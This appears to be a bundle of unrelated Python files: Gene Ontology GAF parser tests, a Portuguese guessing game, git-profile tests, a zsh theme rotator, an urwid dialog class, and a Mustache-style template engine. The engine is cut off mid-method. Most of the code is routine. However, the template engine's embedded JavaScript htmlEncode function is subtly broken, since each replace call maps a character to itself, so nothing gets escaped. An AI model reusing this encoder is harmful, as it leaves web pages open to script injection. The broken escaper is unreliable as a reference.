assert len(list(filter(lambda e: e["obj"] == "involved_in", p.report.to_report_json()["messages"]["gorule-0000001"]))) == 1
def test_qualifiers_gaf_2_2():
p = GafParser()
assocs = p.parse(open("tests/resources/test-qualifiers-2.2.gaf"), skipheader=True)
# NOT by itself is not allowed
assert len(list(filter(lambda e: e["obj"] == "NOT", p.report.to_report_json()["messages"]["gorule-0000001"]))) == 1
assert len(list(filter(lambda e: e["obj"] == "contributes_to|enables", p.report.to_report_json()["messages"]["gorule-0000001"]))) == 1
assert len([a for a in assocs if association.Curie.from_str("RO:0004035") in a.qualifiers]) == 1
def test_gaf_2_1_creates_cell_component_closure():
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
closure = gafparser.protein_complex_sublcass_closure(ontology)
# "GO:1902494" as an example that should be in the set
assert "GO:0005840" in closure
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
with open("tests/resources/pombase_single.gaf") as gaf:
# First line will be version declaration, triggering closure computation
p.parse_line(gaf.readline())
assert "GO:0005840" in p.cell_component_descendants_closure
def test_gaf_2_1_qualifiers_upconvert():
line = ["SGD", "S000000819", "AFG3", "", "GO:0005840", "PMID:8681382|SGD_REF:S000055187", "IMP", "", "P", "Mitochondrial inner membrane m-AAA protease component", "YER017C|AAA family ATPase AFG3|YTA10", "gene", "taxon:559292", "20170428", "SGD"]
parsed = gafparser.to_association(line)
assoc = parsed.associations[0]
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
p.make_internal_cell_component_closure()
assoc = p.upgrade_empty_qualifier(assoc)
assert assoc.qualifiers[0] == association.Curie(namespace="BFO", identity="0000050")
def test_gaf_2_1_upconvert_in_parse():
gaf = io.StringIO("!gaf-version: 2.1\nSGD\tS000000819\tAFG3\t\tGO:0005840\tPMID:8681382|SGD_REF:S000055187\tIMP\t\tP\tMitochondrial inner membrane m-AAA protease component\tYER017C|AAA family ATPase AFG3|YTA10\tgene\ttaxon:559292\t20170428\tSGD")
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
# We're 2.1, qualifier blank, cell component term from above, ontology defined: should upgrade
assocs = p.parse(gaf, skipheader=True)
assert assocs[0].relation == association.Curie(namespace="BFO", identity="0000050")
def test_gaf_2_1_simple_terms():
line = ["SGD", "S000000819", "AFG3", "", "GO:0006259", "PMID:8681382|SGD_REF:S000055187", "IMP", "", "P", "Mitochondrial inner membrane m-AAA protease component", "YER017C|AAA family ATPase AFG3|YTA10", "gene", "taxon:559292", "20170428", "SGD"]
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
p.make_internal_cell_component_closure()
parsed = gafparser.to_association(line)
assoc = p.upgrade_empty_qualifier(parsed.associations[0])
assert assoc.qualifiers[0] == association.Curie(namespace="RO", identity="0002264")
line = ["SGD", "S000000819", "AFG3", "", "GO:0042393", "PMID:8681382|SGD_REF:S000055187", "IMP", "", "P",
"Mitochondrial inner membrane m-AAA protease component", "YER017C|AAA family ATPase AFG3|YTA10", "gene",
"taxon:559292", "20170428", "SGD"]
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
p.make_internal_cell_component_closure()
parsed = gafparser.to_association(line)
assoc = p.upgrade_empty_qualifier(parsed.associations[0])
assert assoc.qualifiers[0] == association.Curie(namespace="RO", identity="0002327")
line = ["SGD", "S000000819", "AFG3", "", "GO:0005773", "PMID:8681382|SGD_REF:S000055187", "IMP", "", "P",
"Mitochondrial inner membrane m-AAA protease component", "YER017C|AAA family ATPase AFG3|YTA10", "gene",
"taxon:559292", "20170428", "SGD"]
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
p.make_internal_cell_component_closure()
parsed = gafparser.to_association(line)
assoc = p.upgrade_empty_qualifier(parsed.associations[0])
assert assoc.qualifiers[0] == association.Curie(namespace="RO", identity="0001025")
def test_upgrade_qualifiers_for_biological_process():
line = ["SGD", "S000000819", "AFG3", "", "GO:0008150", "PMID:8681382|SGD_REF:S000055187", "IMP", "", "P",
"Mitochondrial inner membrane m-AAA protease component", "YER017C|AAA family ATPase AFG3|YTA10", "gene",
"taxon:559292", "20170428", "SGD"]
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
p.make_internal_cell_component_closure()
parsed = gafparser.to_association(line)
assoc = p.upgrade_empty_qualifier(parsed.associations[0])
assert assoc.qualifiers[0] == association.Curie(namespace="RO", identity="0002331")
def test_upgrade_qualifiers_for_cell_component():
line = ["SGD", "S000000819", "AFG3", "", "GO:0008372", "PMID:8681382|SGD_REF:S000055187", "IMP", "", "P",
"Mitochondrial inner membrane m-AAA protease component", "YER017C|AAA family ATPase AFG3|YTA10", "gene",
"taxon:559292", "20170428", "SGD"]
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
p.make_internal_cell_component_closure()
parsed = gafparser.to_association(line)
assoc = p.upgrade_empty_qualifier(parsed.associations[0])
assert assoc.qualifiers[0] == association.Curie(namespace="RO", identity="0002432")
def test_default_gaf_version():
p = GafParser()
assocs = p.parse(open("tests/resources/test-qualifiers-no-version.gaf"), skipheader=True)
assert p.version == "2.1"
def parse_with2(f, p):
ont = OntologyFactory().create(ONT)
p.config.ontology = ont
assocs = p.parse(open(f, "r"), skipheader=True)
neg_assocs = [a for a in assocs if a.negated == True]
assert len(neg_assocs) == 3
for a in assocs:
print('REL: {}'.format(a.relation))
assert len([a for a in assocs if str(a.relation) == relations.lookup_label('involved_in')]) == 1
assert len([a for a in assocs if str(a.relation) == relations.lookup_label('contributes_to')]) == 1
def test_errors_gaf():
config = assocparser.AssocParserConfig(
ecomap=EcoMap()
)
p = GafParser(config=config)
assocs = p.parse(open("tests/resources/errors.gaf", "r"), skipheader=True)
msgs = p.report.messages
print(json.dumps(p.report.to_report_json(), indent=4))
# print("MESSAGES: {}".format(len(msgs)))
n_invalid_idspace = 0
for m in msgs:
print("MESSAGE: {}".format(m))
if m['type'] == assocparser.Report.INVALID_IDSPACE:
n_invalid_idspace += 1
assert len(msgs) == 13
assert n_invalid_idspace == 1
assert len(assocs) == 2
w = GafWriter()
w.write(assocs)
for a in assocs:
if a.object_extensions != []:
# our test file has no ORs, so in DNF this is always the first
xs = a.object_extensions[0].elements
print(xs)
for x in xs:
print('X: {}'.format(x))
# ensure that invalid expressions have been eliminated
assert x.relation == association.Curie("BFO", "0000050")
assert x.term == association.Curie.from_str('X:1')
assert len(xs) == 1
ALT_ID_ONT = "tests/resources/obsolete.json"
def test_alt_id_repair():
p = GafParser()
ont = OntologyFactory().create(ALT_ID_ONT)
p.config.ecomap = EcoMap()
p.config.ontology = ont
gaf = io.StringIO("SGD\tS000000819\tAFG3\t\tGO:1\tPMID:8681382|SGD_REF:S000055187\tIMP\t\tP\tMitochondrial inner membrane m-AAA protease component\tYER017C|AAA family ATPase AFG3|YTA10\tgene\ttaxon:559292\t20170428\tSGD")
assocs = p.parse(gaf, skipheader=True)
# GO:1 is obsolete, and has replaced by GO:0034622, so we should see that class ID.
assert assocs[0].object.id == association.Curie.from_str("GO:2")
gaf = io.StringIO("SGD\tS000000819\tAFG3\t\tGO:4\tPMID:8681382|SGD_REF:S000055187\tIMP\t\tP\tMitochondrial inner membrane m-AAA protease component\tYER017C|AAA family ATPase AFG3|YTA10\tgene\ttaxon:559292\t20170428\tSGD")
assocs = p.parse(gaf, skipheader=True)
# GO:4 is obsolete due to it being merged into GO:3
assert assocs[0].object.id == association.Curie.from_str("GO:3")
def test_gorule_repair():
config = assocparser.AssocParserConfig(
ontology=OntologyFactory().create("tests/resources/goslim_generic.json")
)
p = GafParser(config=config)
# Here this gaf line has the wrong aspect, and should be picked up by gorule 28
gaf = io.StringIO("PomBase\tSPCC962.06c\tbpb1\t\tGO:0005634\tPMID:20970342\tIPI\t\tP\tKH and CC/hC domain splicing factor Bpb1\tsf1|ods3\tprotein\ttaxon:4896\t20110804\tPomBase\tpart_of(GO:0007137)")
assocs = p.parse(gaf, skipheader=True)
assert assocs[0].aspect == "C"
assert len(p.report.to_report_json()["messages"]["gorule-0000028"]) == 1
assert p.report.to_report_json()["messages"]["gorule-0000028"][0]["type"] == assocparser.Report.VIOLATES_GO_RULE
def test_bad_date():
p = GafParser()
assoc_result = p.parse_line("PomBase\tSPAC25B8.17\typf1\t\tGO:0000007\tGO_REF:0000024\tISO\tSGD:S000001583\tC\tintramembrane aspartyl protease of the perinuclear ER membrane Ypf1 (predicted)\tppp81\tprotein\ttaxon:4896\tTODAY\tPomBase\tfoo(X:1)")
assert assoc_result.skipped == True
assert assoc_result.associations == []
def test_subject_extensions():
p = GafParser()
assoc_result = p.parse_line("PomBase\tSPAC25B8.17\typf1\t\tGO:0000007\tGO_REF:0000024\tISO\tSGD:S000001583\tC\tintramembrane aspartyl protease of the perinuclear ER membrane Ypf1 (predicted)\tppp81\tprotein\ttaxon:4896\t20181024\tPomBase\tpart_of(X:1)\tUniProtKB:P12345")
assert len(assoc_result.associations[0].subject_extensions) == 1
subject_extensions = assoc_result.associations[0].subject_extensions
gene_product_form_id = subject_extensions[0].term
assert gene_product_form_id == association.Curie.from_str("UniProtKB:P12345")
def test_bad_withfrom():
p = GafParser()
# With/from has no identity portion after the namespace
assoc_result = p.parse_line("PomBase\tSPAC25B8.17\typf1\t\tGO:0000007\tGO_REF:0000024\tISO\tSGD:\tC\tintramembrane aspartyl protease of the perinuclear ER membrane Ypf1 (predicted)\tppp81\tprotein\ttaxon:4896\t20181024\tPomBase")
assert assoc_result.associations == []
assert p.report.to_report_json()["messages"]["gorule-0000001"][0]["obj"] == "SGD:"
def test_subject_extensions_bad_curie():
"""
Offending field is `GDP_bound`
"""
p = GafParser()
assoc_result = p.parse_line("PomBase\tSPBC1289.03c\tspi1\t\tGO:0005515\tPMID:18422602\tIPI\tPomBase:SPAC25A8.01c\tF\tRan GTPase Spi1\t\tprotein\ttaxon:4896\t20080718\tPomBase\t\tGDP_bound")
assert assoc_result.associations == []
assert assoc_result.skipped == True
assert len(p.report.to_report_json()["messages"]["gorule-0000001"]) == 1
assert p.report.to_report_json()["messages"]["gorule-0000001"][0]["type"] == p.report.INVALID_ID
assert p.report.to_report_json()["messages"]["gorule-0000001"][0]["obj"] == "GDP_bound"
print(json.dumps(p.report.to_report_json(), indent=4))
def test_object_extensions():
p = GafParser()
assoc_result = p.parse_line("PomBase\tSPAC25B8.17\typf1\t\tGO:0000007\tGO_REF:0000024\tISO\tSGD:S000001583\tC\tintramembrane aspartyl protease of the perinuclear ER membrane Ypf1 (predicted)\tppp81\tprotein\ttaxon:4896\t20181024\tPomBase\tpart_of(X:1)\tUniProtKB:P12345")
print(p.report.to_markdown())
assert len(assoc_result.associations[0].object_extensions) > 0
object_extensions = [
association.ConjunctiveSet([
association.ExtensionUnit(association.Curie("BFO", "0000050"), association.Curie("X", "1"))
])
]
assert assoc_result.associations[0].object_extensions == object_extensions
def test_object_extensions_error():
p = GafParser()
assoc_result = p.parse_line("PomBase\tSPAC25B8.17\typf1\t\tGO:0000007\tGO_REF:0000024\tISO\tSGD:S000001583\tC\tintramembrane aspartyl protease of the perinuclear ER membrane Ypf1 (predicted)\tppp81\tprotein\ttaxon:4896\t20181024\tPomBase\tpart_of(X)\tUniProtKB:P12345")
assert len(p.report.to_report_json()["messages"]["gorule-0000001"]) == 1
def test_factory():
afa = AssociationSetFactory()
ont = OntologyFactory().create(ONT)
aset = afa.create_from_file(POMBASE, ontology=ont, skim=False)
found = 0
for s in aset.subjects:
print('{} {}'.format(s, aset.label(s)))
for c in aset.annotations(s):
print(' {} {}'.format(c, ont.label(c)))
for a in aset.associations(s, c):
e = a['evidence']
print(' {} {} {}'.format(e['type'], e['with_support_from'], e['has_supporting_reference']))
if s == 'PomBase:SPBC2D10.10c' and c == 'GO:0005730':
if e['type'] == 'ISO':
if e['with_support_from'] == ['SGD:S000002172'] and e['has_supporting_reference'] == ['GO_REF:0000024']:
found +=1
logging.info('** FOUND: {}'.format(a))
if e['type'] == 'IDA':
if e['has_supporting_reference'] == ['PMID:16823372']:
found +=1
logging.info('** FOUND: {}'.format(a))
assert len(aset.associations_by_subj) > 0
assert found == 2
if __name__ == "__main__":
pytest.main(args=["tests/test_gafparser.py::test_parse_gaf"])
|
from random import randint
computador = randint(0, 10)
ntentativas = 0
print('''Sou seu computador...
Acabei de pensar em um número entre 0 e 10.
Será que você consegue advinhar qual foi?''')
jogada = int(input('Qual é o seu palpite? '))
while jogada != computador:
if jogada < computador:
print('Mais... Tente novamente.')
if jogada > computador:
print('Menos... Tente novamente.')
ntentativas += 1
jogada = int(input('Qual é o seu palpite? '))
print('Acertou com {} tentativa{}. Parabéns!'.format(ntentativas + 1, '' if ntentativas == 0 else 's'))
|
import io
import os
import sys
import pytest
from random import randrange
myPath = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, myPath + "/../")
import src.utils.messages as msg
from src.executor import executor, parser
from src.git_manager.git_manager import GitManager
from src.profile.profile import Profile
@pytest.fixture(autouse=True)
def prepare():
git = GitManager({})
profiles_to_add = []
# Generate 10 profiles
for i in range(10):
test = "test-local-{0}".format(i)
profile = Profile(test, test, None, test)
profiles_to_add.append(profile)
for p in profiles_to_add:
git.add_profile(p)
yield git
class TestDelProfile:
def test_del_profile_not_found(self, capsys):
test = "profile-{0}".format(randrange(100000))
arg_parser = parser.get_arguments_parser()
arguments = arg_parser.parse_args(["del", test])
executor.execute_command(arguments)
out, err = capsys.readouterr()
delmsg = msg.ERR_NO_PROFILE.format(test)
assert delmsg in out
assert not err
def test_del_profile_ok(self, capsys):
arg_parser = parser.get_arguments_parser()
for i in range(10):
test = "test-local-{0}".format(i)
arguments = arg_parser.parse_args(["del", test])
executor.execute_command(arguments)
delmsg = msg.INFO_DEL_SUCCESS.format(test)
out, err = capsys.readouterr()
assert delmsg in out
assert not err
|
import os
import re
import json
from sys import exit
from arguments import verify_args
# return the $HOME path
def get_home():
try:
return open('/home/.zshuserpath').readline().strip()
except FileNotFoundError:
return os.getenv('HOME')
# return the absolute path of zsh config file
# '/home/venturini/.zshrc', eg.
def get_path(file):
home_path = get_home()
return os.path.join(home_path, file)
# open the ~/.zshrc or ~/.zshday
def open_file(file, mode='r'):
path = get_path(file)
return open(path, mode)
# read the ~/.zshday and return the new theme
# also, update the ~/.zshday file
def get_theme(zshday_file):
zshday_obj = json.load(zshday_file)
try:
theme_number = zshday_obj['theme_of_day']
# at the end of themes, come back to first theme
zshday_obj['theme_of_day'] = (theme_number + 1) % len(zshday_obj['themes'])
return zshday_obj['themes'][theme_number]
except Exception as ex:
#print(str(ex))
exit(1)
finally:
# before go out the function, update the .zshday file
json.dump(zshday_obj, open(get_path('.zshday'), 'w'), indent=2)
# read all .zshrc file
# re-write all lines at file
# when re-writing, replace the 'ZSH_THEME="*"'
# it's necessary because i'm reading and writing at same time in same file
def update_theme(zshrc_file_reader, new_theme):
# read all zshrc lines
lines = zshrc_file_reader.readlines()
# open a new .zshrc file to write
with open_file(get_path('.zshrc'), 'w') as zshrc_file_writer:
for line in lines:
# ignore all line that starts with comments "#"
# and only verify others lines
if not line.startswith('#') and re.match('ZSH_THEME="[\w-]+"\n', line):
line = 'ZSH_THEME="{}"\n'.format(new_theme)
zshrc_file_writer.write(line)
# open the ~/.zshrc file and the ~/.zshday file
# then select and change the theme name
def worker():
try:
zshrc_file = open_file('.zshrc')
zshday_file = open_file('.zshday')
# if the execution is only to use args
verify_args(zshrc_file, zshday_file)
new_theme = get_theme(zshday_file)
update_theme(zshrc_file, new_theme)
except FileNotFoundError as ex:
pass
if __name__.__eq__('__main__'):
worker()
|
#!/usr/bin/env python
import form, app, urwid, layout, button
class Dialog (form.Form):
"""
A modular Form designed to be displayed over the top of other forms.
"""
def __init__ (self, parent, width, height, align='center', valign='middle', shadow=u'\u2592', top_widget=None):
"""
Initialise a dialog. Requires the same parameters as a Form, in addition:
parent: the UrwidApp parent.
width: the width of the dialog.
height: the height of the dialog.
align: where the dialog should be displayed horizontally.
valign: where the dialog should be displayed vertically.
shadow: the character to be used as a "drop shadow".
top_widget: the top widget of the form.
"""
self.width = width
self.height = height
self.align = align
self.valign = valign
self.shadow = shadow
self.result = None
self.showing_modal = False
form.Form.__init__(self, parent, top_widget)
def MakeShadow (self):
"""
Create a box widget that is displayed as the "shadow" of the dialog.
"""
return urwid.SolidFill(self.shadow)
def MakeOverlay (self):
"""
Builds a series of overlays: overlay1 consists of the shadow on top of the currently displayed widget. overlay2 consists of the dialog on top of the shadow.
"""
self.overlay1 = layout.OffsetOverlay(self.MakeShadow(), self.GetParent().GetCurrentWidget(), self.align, self.width, self.valign, self.height)
self.overlay2 = urwid.Overlay(self.GetTopWidget(), self.overlay1, self.align, self.width, self.valign, self.height)
return self.overlay2
def Show (self, discard_current=False):
"""
Shows the dialog on top of the currently displayed widget.
"""
assert self.GetTopWidget() is not None
self.GetParent().SetTopForm(self, not discard_current)
self.GetParent().Show(self.MakeOverlay())
def GotResult (self, result):
"""
A convenience function for parsing the "result" of a dialog. For modally displayed dialogs it merely stores the result. For non-modal dialogs, it dismisses the dialog as well as storing the result.
"""
if self.showing_modal:
def f (*args):
self.result = result
else:
def f (*args):
self.result = result
self.ShowPrevious()
return f
def ShowModal (self):
"""
Enter into a sub-loop to display the dialog. All key inputs will be based to the relevant sub-widgets. The function will block until a "result" is gathered from the dialog (pressing a key, selecting a button, providing a relevant value, etc), at which point the result will be returned to the calling thread.
"""
self.showing_modal = True
self.Show()
self.result = None
parent = self.GetParent().main_loop
while not self.result:
parent.draw_screen()
keys = None
while not keys:
keys, raw = parent.screen.get_input(True)
keys = parent.input_filter(keys, raw)
if keys:
parent.process_input(keys)
if 'window resize' in keys:
parent.screen_size = None
self.showing_modal = False
return self.result
class ButtonDialog (Dialog):
"""
A sub-dialog consisting of a displayed string (passed via 'caption') and a series of buttons (as defined in _uxconf.BUTTON_LIST).
"""
def __init__ (self, parent, width, height, align='center', valign='middle', shadow=u'\u2592', caption="", focus="", **buttons):
"""
Initiliases the ButtonDialog. Extra parameters:
caption: the text caption to be displayed.
**buttons: a series of keyword arguments with a boolean true value for the button in question to be displayed (or false for it not to be displayed0.
"""
self.caption_text = caption
self.buttons = buttons
self.focus = focus
# NB: Width and height increased by two to compensate for LineBox.
Dialog.__init__ (self, parent, width+2, height+2, align, valign, shadow, None)
def OnInit (self):
"""
Dynamically builds the dialog based on the supplied variables.
"""
self.caption = urwid.Text(self.caption_text)
self.button_list = []
focus_column = None
for btype, bval in self.buttons.iteritems():
if not bval:
continue
if not button.has_button(btype):
raise IndexError, btype
btn = button.get_button(btype)
widget = urwid.Button(label=btn.label, on_press=self.GotResult(btn.result))
caption = widget.get_label()
wrapped_widget = urwid.Padding(widget, 'center', len(caption)+4)
self.button_list.append(wrapped_widget)
self.BindText(btn.hotkey, self.GotResult(btn.result))
if caption.lower() == self.focus.lower():
focus_column = self.button_list.index(wrapped_widget)
if focus_column == 0:
focus_column = None
if self.button_list:
self.columns = urwid.Columns(self.button_list, dividechars=1, focus_column=focus_column)
self.pile = urwid.Pile([('fixed', self.height-3, urwid.Filler(self.caption, 'top')), self.columns])
self.layout = urwid.LineBox(urwid.Filler(self.pile))
else:
self.layout = urwid.LineBox(urwid.Filler(self.caption))
self.layout2 = urwid.AttrMap(self.layout, 'dialog')
self.SetTopWidget(self.layout2)
|
from __future__ import generators
import sys
try:
# py 3.8+
from html import escape
except ImportError:
# py2
from cgi import escape
try:
raise ImportError
import itertools
itertools_takewhile = itertools.takewhile
except ImportError:
# fake it
def takewhile(predicate, iterable):
# takewhile(lambda x: x<5, [1,4,6,4,1]) --> 1 4
for x in iterable:
if predicate(x):
yield x
else:
break
itertools_takewhile = takewhile
try:
from sys import intern
except ImportError:
pass
py_ver = sys.version[:3]
py_v3 = py_ver >= '3.0'
if py_v3:
string_func = str
else:
string_func = unicode
TOKEN_RAW = intern('raw')
TOKEN_TAGOPEN = intern('tagopen')
TOKEN_TAGINVERT = intern('taginvert')
TOKEN_TAGCLOSE = intern('tagclose')
TOKEN_TAGCOMMENT = intern('tagcomment')
TOKEN_TAGDELIM = intern('tagdelim')
TOKEN_TAG = intern('tag')
TOKEN_PARTIAL = intern('partial')
TOKEN_PUSH = intern('push')
TOKEN_BOOL = intern('bool')
BOOTSRAP_PRE = """
(function(data){
var isArray = Array.isArray || function(obj) {
return toString.call(obj) == '[object Array]';
},
each = function(obj, iterator, context) {
if (obj == null) return;
if (Array.prototype.forEach && obj.forEach === Array.prototype.forEach) {
obj.forEach(iterator, context);
} else if (obj.length === +obj.length) {
for (var i = 0, l = obj.length; i < l; i++) {
if (i in obj && iterator.call(context, obj[i], i, obj) === breaker) return;
}
} else {
for (var key in obj) {
if (obj.hasOwnProperty(key)) {
if (iterator.call(context, obj[key], key, obj) === breaker) return;
}
}
}
},
map = function(obj, iterator, context) {
var results = [];
if (obj == null) return results;
if (Array.prototype.map && obj.map === Array.prototype.map) return obj.map(iterator, context);
each(obj, function(value, index, list) {
results[results.length] = iterator.call(context, value, index, list);
});
if (obj.length === +obj.length) results.length = obj.length;
return results;
},
htmlEncode = function(str) {
return String(str)
.replace(/&/g, '&')
.replace(/"/g, '"')
.replace(/'/g, ''')
.replace(/</g, '<')
.replace(/>/g, '>');
},
lookup = function (data, datum) {
var i = 0,
l = data ? data.length : 0;
for (; i < l; i += 1) {
if (datum === '.') {
return data[i]
} else if (data[i] !== void 0 && data[i][datum] !== void 0 && data[i][datum] !== false) {
if (toString.call(data[i][datum]) == '[object Function]') {
return data[i][datum](data)
} else {
return data[i][datum]
}
}
}
return '';
},
section = function(data, tagvalue, callback, invert){
invert = invert || false;
if (isArray(tagvalue)) {
if (!invert && tagvalue.length > 0) {
return map(tagvalue, function(v) { return callback([v].concat(data))}).join('')
} else if (invert && tagvalue.length == 0) {
return callback(data);
}
} else {
if((!invert && tagvalue) || (invert && !tagvalue)) {
if (tagvalue !== void 0 || tagvalue !== true) {
return callback([tagvalue].concat(data));
} else {
return callback(data);
}
}
}
};
"""
BOOTSRAP_POST = """
})
"""
def _checkprefix(tag, prefix):
if tag and tag[0] == prefix:
return tag[1:].strip()
else:
return None
def _lookup(data, datum):
for scope in data:
if datum == '.':
return string_func(scope)
elif datum in scope:
return scope[datum]
elif hasattr(scope, datum):
return getattr(scope, datum)
return None
def _renderjsfunction(parts, prefix = "", postfix = "", params="data, tag"):
return "function({params}) {{{prefix} return {content} {postfix} }}".format(
content=_renderjsjoin(*parts),
prefix=prefix,
postfix=postfix,
params=params)
def _renderjsjoin(*args):
return "[{0}].join('');".format(','.join(args))
def render(template, data):
return Stache().render(template, data)
def render_js(template):
return Stache().render_js(template)
class Stache(object):
def __init__(self):
self.otag = '{{'
self.ctag = '}}'
self.templates = {}
self.hoist = {}
self.hoist_data = {}
self.section_counter = 0
def copy(self):
copy = Stache()
copy.templates = self.templates
return copy
def add_template(self, name, template):
self.templates[name] = list(self._tokenize(template))
def render(self, template, data={}):
self.otag = '{{'
self.ctag = '}}'
return ''.join(self._parse(self._tokenize(template), data))
def render_iter(self, template, data={}):
copy = self.copy()
return copy._parse(copy._tokenize(template), data)
def render_template(self, template_name, data={}):
self.otag = '{{'
self.ctag = '}}'
return ''.join(self._parse(iter(list(self.templates[template_name])), data))
def render_template_iter(self, template_name, data={}):
copy = self.copy()
return copy._parse(iter(list(copy.templates[template_name])), data)
def _js_hoisted(self, bare=True):
hoist = ''
if self.templates:
hoist += "\n var templates = {};\n"
for name in self.templates:
render_function = list(self._jsparse(iter(list(self.templates[name]))))
newparams = "data"
prefix = ""
if not bare and self.hoist_data:
hoisted = map(lambda x: '"{0}": {1}, '.format(x, self.hoist_data[x], "baseData"), self.hoist_data.keys())
prefix = ' var data = [dat2, {{{0}}}];'.format(', '.join(hoisted))
self.hoist_data = {}
newparams = 'dat2';
hoist += ' templates["{0}"] = {1};\n'.format(name, _renderjsfunction(render_function, prefix=prefix, params=newparams))
if self.hoist:
for name in self.hoist:
hoist += ' var {0} = {1};\n'.format(name, self.hoist[name])
if bare:
if self.hoist_data:
for name in self.hoist_data:
hoist += ' {2}["{0}"] = {1};\n'.format(name, self.hoist_data[name], "data")
return hoist
def render_js(self, template):
copy = self.copy()
renderedjs = _renderjsjoin(*list(copy._jsparse(copy._tokenize(template))))
hoist = copy._js_hoisted()
jstemplate = "{0}\n {1}\n data = [data];\n return {2};\n{3}"
return jstemplate.format(BOOTSRAP_PRE, hoist, renderedjs, BOOTSRAP_POST)
def render_js_template(self, template_name):
copy = self.copy()
hoist = copy._js_hoisted(bare=False)
jstemplate = "{0}\n {1}\n return templates['{2}']([data]);\n{3}"
return jstemplate.format(BOOTSRAP_PRE, hoist, template_name, BOOTSRAP_POST)
def render_all_js(self):
copy = self.copy()
hoist = copy._js_hoisted(bare=False)
jstemplate = "{0}\n var baseData={{}};\n {1}\n return templates;\n{2}"
return jstemplate.format(BOOTSRAP_PRE, hoist, BOOTSRAP_POST)
def _tokenize(self, template):
rest = template
scope = []
while rest and len(rest) > 0:
pre_section = rest.split(self.otag, 1)
if len(pre_section) == 2:
pre, rest = pre_section
else:
pre, rest = (pre_section[0], None)
if rest:
taglabel, rest = rest.split(self.ctag, 1)
else:
taglabel, rest = (None, None)
if taglabel:
taglabel = taglabel.strip()
else:
taglabel = ''
open_tag = _checkprefix(taglabel, '#')
if not open_tag:
invert_tag = _checkprefix(taglabel, '^')
else:
invert_tag = None
if not invert_tag:
close_tag = _checkprefix(taglabel, '/')
else:
close_tag = None
comment_tag = None
partial_tag = None
push_tag = None
bool_tag = None
booltern_tag = None
unescape_tag = None
if not close_tag:
comment_tag = _checkprefix(taglabel, '!')
if not comment_tag:
partial_tag = _checkprefix(taglabel, '>')
if not partial_tag:
push_tag = _checkprefix(taglabel, '<')
if not push_tag:
bool_tag = _checkprefix(taglabel, '?')
if not bool_tag:
booltern_tag = _checkprefix(taglabel, ':')
if not booltern_tag:
unescape_tag = _checkprefix(taglabel, '{')
if unescape_tag:
rest = rest[1:]
else:
rest = rest # FIXME seems like a NOOP
if not booltern_tag:
unescape_tag = (unescape_tag or _checkprefix(taglabel, '&'))
else:
unescape_tag = None
if not unescape_tag and len(taglabel) >= 2 and taglabel[0] == '=' and taglabel[-1] == '=':
delim_tag = taglabel[1:-1]
else:
delim_tag = None
if delim_tag:
delim_tag = delim_tag.split(' ', 1)
else:
delim_tag = None
if delim_tag and len(delim_tag) == 2:
delim_tag = delim_tag
else:
delim_tag = None
# fix for https://github.com/hyperturtle/Stache/issues/2 from https://github.com/SmithSamuelM/staching/commit/f2c591ec69cc922c6ffec67e0d66f8047f2f2bf3
if ( open_tag or invert_tag or comment_tag or
partial_tag or push_tag or bool_tag or
booltern_tag or unescape_tag or delim_tag): # not a variable
inline = False
if rest: # strip trailing whitespace and linefeed if present
front, sep, back = rest.partition("\n") # partition at linefeed
if sep:
if not front.strip(): # only whitespace before linefeed
rest = back # removed whitespace and linefeed
#if _debug: print( "open rest strip front: \n%s" % rest)
else: #inline
inline = True
#if _debug: print( "open inline:")
if not inline and pre: #strip trailing whitespace after linefeed if present
front, sep, back = pre.rpartition("\n")
if sep:
if not back.strip(): # only whitespace after linefeed
pre = ''.join((front, sep)) # restore linefeed
#if _debug: print( "open pre strip back: \n%s" % pre)
else:
pre = back.rstrip() #no linefeed so rstrip
#if _debug: print( "open pre rstrip back: \n%s" % pre)
elif close_tag:
inline = True # section is inline
follow = False # followed by inline
post = ''
if rest: # see if inline follows
front, sep, back = rest.partition("\n")
if front.strip(): # not empty before linefeed so inline follows
follow = True # inline follows
#if _debug: print( "close follow:")
if pre: #strip trailing whitespace after prev linefeed if present
front, sep, back = pre.rpartition("\n")
if sep and not back.strip(): # only whitespace after linefeed
inline = False
#if _debug: print() "close not inline:" )
if follow:
post = back # save spacing for following inline
pre = ''.join((front, sep)) # restore upto linefeed
#if _debug: print( "close pre strip back: \n%s" % pre)
if not inline and rest: # strip trailing whitespace and linefeed if present
if follow: # restore saved spacing
rest = post + rest
#print( "close follow rest: \n%s" % rest)
front, sep, back = rest.partition("\n") # partition at linefeed
if sep:
if not front.strip(): # only whitespace before linefeed
rest = back # remove trailing whitespace and linefeed
#if _debug: print( "close rest strip front: \n%s" % rest)
if push_tag:
pre = pre.rstrip()
rest = rest.lstrip()
if pre:
yield TOKEN_RAW, pre, len(scope)
if open_tag:
scope.append(open_tag)
yield TOKEN_TAGOPEN, open_tag, len(scope)
elif bool_tag:
scope.append(bool_tag)
yield TOKEN_BOOL, bool_tag, len(scope)
elif invert_tag:
scope.append(invert_tag)
yield TOKEN_TAGINVERT, invert_tag, len(scope)
elif close_tag is not None:
current_scope = scope.pop()
if close_tag:
assert (current_scope == close_tag), 'Mismatch open/close blocks'
yield TOKEN_TAGCLOSE, current_scope, len(scope)+1
elif booltern_tag:
scope.append(booltern_tag)
yield TOKEN_TAG, booltern_tag, 0
yield TOKEN_TAGINVERT, booltern_tag, len(scope)
elif comment_tag:
yield TOKEN_TAGCOMMENT, comment_tag, 0
elif partial_tag:
yield TOKEN_PARTIAL, partial_tag, 0
elif push_tag:
scope.append(push_tag)
yield TOKEN_PUSH, push_tag, len(scope)
elif delim_tag:
yield TOKEN_TAGDELIM, delim_tag, 0
elif unescape_tag:
yield TOKEN_TAG, unescape_tag, True
else:
yield TOKEN_TAG, taglabel, False
def _parse(self, tokens, *data):
for token in tokens:
